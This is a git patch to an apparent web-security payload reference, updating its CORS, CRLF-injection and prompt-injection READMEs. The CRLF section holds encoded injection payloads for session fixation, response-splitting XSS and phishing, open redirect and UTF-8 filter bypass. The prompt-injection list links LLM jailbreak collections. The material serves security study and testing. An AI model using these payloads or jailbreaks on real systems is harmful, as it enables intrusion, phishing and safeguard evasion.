From 35109b415418d2b203b85d1f9ee8f07d5cca2e8d Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 24 Nov 2024 13:44:55 +0100 Subject: [PATCH] CORS and CRLF updates --- CORS Misconfiguration/README.md | 16 ++-- CRLF Injection/README.md | 144 +++++++++++++++++++------------- Prompt Injection/README.md | 2 +- 3 files changed, 95 insertions(+), 67 deletions(-) diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md index 8d599db..c6d5b87 100644 --- a/CORS Misconfiguration/README.md +++ b/CORS Misconfiguration/README.md @@ -11,7 +11,7 @@ * [Origin Reflection](#origin-reflection) * [Null Origin](#null-origin) * [XSS on Trusted Origin](#xss-on-trusted-origin) - * [Wildcard Origin `*` without Credentials](#wildcard-origin--without-credentials) + * [Wildcard Origin without Credentials](#wildcard-origin-without-credentials) * [Expanding the Origin](#expanding-the-origin) * [Labs](#labs) * [References](#references) @@ -19,11 +19,11 @@ ## Tools -* [s0md3v/Corsy - CORS Misconfiguration Scanner](https://github.com/s0md3v/Corsy/) -* [chenjj/CORScanner - Fast CORS misconfiguration vulnerabilities scanner](https://github.com/chenjj/CORScanner) -* [PostMessage POC Builder - @honoki](https://tools.honoki.net/postmessage.html) -* [trufflesecurity/of-cors - Exploit CORS misconfigurations on the internal networks](https://github.com/trufflesecurity/of-cors) -* [omranisecurity/CorsOne - Fast CORS Misconfiguration Discovery Tool](https://github.com/omranisecurity/CorsOne) +* [s0md3v/Corsy](https://github.com/s0md3v/Corsy/) - CORS Misconfiguration Scanner +* [chenjj/CORScanner](https://github.com/chenjj/CORScanner) - Fast CORS misconfiguration vulnerabilities scanner +* [@honoki/PostMessage](https://tools.honoki.net/postmessage.html) - POC Builder +* [trufflesecurity/of-cors](https://github.com/trufflesecurity/of-cors) - Exploit CORS misconfigurations on the internal networks +* [omranisecurity/CorsOne](https://github.com/omranisecurity/CorsOne) - Fast CORS Misconfiguration Discovery Tool ## Requirements @@ -149,7 +149,7 @@ again. https://trusted-origin.example.com/?xss= ``` -### Wildcard Origin `*` without Credentials +### Wildcard Origin without Credentials If the server responds with a wildcard origin `*`, **the browser does never send the cookies**. However, if the server does not require authentication, it's still @@ -275,7 +275,7 @@ function reqListener() { - [CORS misconfig | Account Takeover - Rohan (nahoragg) - October 20, 2018](https://hackerone.com/reports/426147) - [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t) - October 29, 2018](https://hackerone.com/reports/430249) - [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax) - September 15, 2016](https://hackerone.com/reports/168574) -- [CORS Misconfigurations Explained - Detectify Blog - Apr 26, 2018](https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/) +- [CORS Misconfigurations Explained - Detectify Blog - April 26, 2018](https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/) - [Cross-origin resource sharing (CORS) - PortSwigger Web Security Academy - December 30, 2019](https://portswigger.net/web-security/cors) - [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy) - June 1, 2017](https://hackerone.com/reports/235200) - [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle - 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties) diff --git a/CRLF Injection/README.md b/CRLF Injection/README.md index 33e12d4..f587c97 100644 --- a/CRLF Injection/README.md +++ b/CRLF Injection/README.md @@ -1,56 +1,89 @@ # Carriage Return Line Feed -> The term CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). They're used to note the termination of a line, however, dealt with differently in today’s popular Operating Systems. For example: in Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is only required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line. - -> A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL. - +> CRLF Injection is a web security vulnerability that arises when an attacker injects unexpected Carriage Return (CR) (\r) and Line Feed (LF) (\n) characters into an application. These characters are used to signify the end of a line and the start of a new one in network protocols like HTTP, SMTP, and others. In the HTTP protocol, the CR-LF sequence is always used to terminate a line. ## Summary * [Methodology](#methodology) - * [Add a cookie](#add-a-cookie) - * [Add a cookie - XSS Bypass](#add-a-cookie---xss-bypass) - * [Write HTML](#write-html) - * [Filter Bypass](#filter-bypass) + * [Session Fixation](#session-fixation) + * [Cross Site Scripting](#cross-site-scripting) + * [Open Redirect](#open-redirect) +* [Filter Bypass](#filter-bypass) * [Labs](#labs) * [References](#references) ## Methodology -### Add a cookie +HTTP Response Splitting is a security vulnerability where an attacker manipulates an HTTP response by injecting Carriage Return (CR) and Line Feed (LF) characters (collectively called CRLF) into a response header. These characters mark the end of a header and the start of a new line in HTTP responses. -Requested page +**CRLF Characters**: + +* `CR` (`\r`, ASCII 13): Moves the cursor to the beginning of the line. +* `LF` (`\n`, ASCII 10): Moves the cursor to the next line. + +By injecting a CRLF sequence, the attacker can break the response into two parts, effectively controlling the structure of the HTTP response. This can result in various security issues, such as: + +* Cross-Site Scripting (XSS): Injecting malicious scripts into the second response. +* Cache Poisoning: Forcing incorrect content to be stored in caches. +* Header Manipulation: Altering headers to mislead users or systems + + +### Session Fixation + +A typical HTTP response header looks like this: ```http -http://www.example.net/%0D%0ASet-Cookie:mycookie=myvalue -``` - -HTTP Response - -```http -Connection: keep-alive -Content-Length: 178 +HTTP/1.1 200 OK Content-Type: text/html -Date: Mon, 09 May 2016 14:47:29 GMT -Location: https://www.example.net/[INJECTION STARTS HERE] -Set-Cookie: mycookie=myvalue -X-Frame-Options: SAMEORIGIN -X-Sucuri-ID: 15016 -x-content-type-options: nosniff -x-xss-protection: 1; mode=block +Set-Cookie: sessionid=abc123 ``` +If user input `value\r\nSet-Cookie: admin=true` is embedded into the headers without sanitization: -### Add a cookie - XSS Bypass +```http +HTTP/1.1 200 OK +Content-Type: text/html +Set-Cookie: sessionid=value +Set-Cookie: admin=true +``` -Requested page +Now the attacker has set their own cookie. + + +### Cross Site Scripting + +Beside the session fixation that requires a very insecure way of handling user session, the easiest way to exploit a CRLF injection is to write a new body for the page. It can be used to create a phishing page or to trigger an arbitrary Javascript code (XSS). + +**Requested page** + +```http +http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E +``` + +**HTTP response** + +```http +Set-Cookie:en +Content-Length: 0 + +HTTP/1.1 200 OK +Content-Type: text/html +Last-Modified: Mon, 27 Oct 2060 14:50:18 GMT +Content-Length: 34 + +You have been Phished +``` + +In the case of an XSS, the CRLF injection allows to inject the `X-XSS-Protection` header with the value value "0", to disable it. And then we can add our HTML tag containing Javascript code . + +**Requested page** ```powershell http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a%0d%0a0%0d%0a/%2f%2e%2e ``` -HTTP Response +**HTTP Response** ```http HTTP/1.1 200 OK @@ -73,45 +106,39 @@ X-XSS-Protection:0 0 ``` +### Open Redirect -### Write HTML +Inject a `Location` header to force a redirect for the user. -Requested page - -```http -http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E -``` - -HTTP response - -```http -Set-Cookie:en -Content-Length: 0 - -HTTP/1.1 200 OK -Content-Type: text/html -Last-Modified: Mon, 27 Oct 2060 14:50:18 GMT -Content-Length: 34 - -You have been Phished +```ps1 +%0d%0aLocation:%20http://myweb.com ``` -### Filter Bypass +## Filter Bypass -Using UTF-8 encoding +[RFC 7230](https://datatracker.ietf.org/doc/html/rfc7230#section-3.2.4) states that most HTTP header field values use only a subset of the US-ASCII charset. + +> Newly defined header fields SHOULD limit their field values to US-ASCII octets. + +Firefox followed the spec by stripping off any out-of-range characters when setting cookies instead of encoding them. + +| UTF-8 Character | Hex | Unicode | Stripped | +| --------- | --- | ------- | -------- | +| `嘊` | `%E5%98%8A` | `\u560a` | `%0A` (\n) | +| `嘍` | `%E5%98%8D` | `\u560d` | `%0D` (\r) | +| `嘾` | `%E5%98%BE` | `\u563e` | `%3E` (>) | +| `嘼` | `%E5%98%BC` | `\u563c` | `%3C` (<) | + +The UTF-8 character `嘊` contains `0a` in the last part of its hex format, which would be converted as `\n` by Firefox. + + +Using UTF-8 encoding: `嘊嘍content-type:text/html嘊嘍location:嘊嘍嘊嘍嘼svg/onload=alert(document.domain()嘾` ```http -%E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE +%E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28document.domain%28%29%E5%98%BE ``` -Remainder: - -* `%E5%98%8A` = `%0A` = \u560a -* `%E5%98%8D` = `%0D` = \u560d -* `%E5%98%BE` = `%3E` = \u563e (>) -* `%E5%98%BC` = `%3C` = \u563c (<) - ## Labs @@ -122,4 +149,5 @@ Remainder: ## References - [CRLF Injection - CWE-93 - OWASP - May 20, 2022](https://www.owasp.org/index.php/CRLF_Injection) -- [Starbucks: [newscdn.starbucks.com] CRLF Injection, XSS - Bobrov - 2016-12-20](https://vulners.com/hackerone/H1:192749) \ No newline at end of file +- [CRLF injection on Twitter or why blacklists fail - XSS Jigsaw - April 21, 2015](https://web.archive.org/web/20150425024348/https://blog.innerht.ml/twitter-crlf-injection/) +- [Starbucks: [newscdn.starbucks.com] CRLF Injection, XSS - Bobrov - December 20, 2016](https://vulners.com/hackerone/H1:192749) \ No newline at end of file diff --git a/Prompt Injection/README.md b/Prompt Injection/README.md index 60f057b..8c58a86 100644 --- a/Prompt Injection/README.md +++ b/Prompt Injection/README.md @@ -28,7 +28,7 @@ List of "payloads" prompts - [Jailbreak Chat](https://www.jailbreakchat.com) - [Inject My PDF](https://kai-greshake.de/posts/inject-my-pdf) - [Chat GPT "DAN" (and other "Jailbreaks")](https://gist.github.com/coolaj86/6f4f7b30129b0251f61fa7baaa881516) -- [leondz/garak](https://github.com/leondz/garak) - LLM vulnerability scanner +- [NVIDIA/garak](https://github.com/NVIDIA/garak) - LLM vulnerability scanner Challenges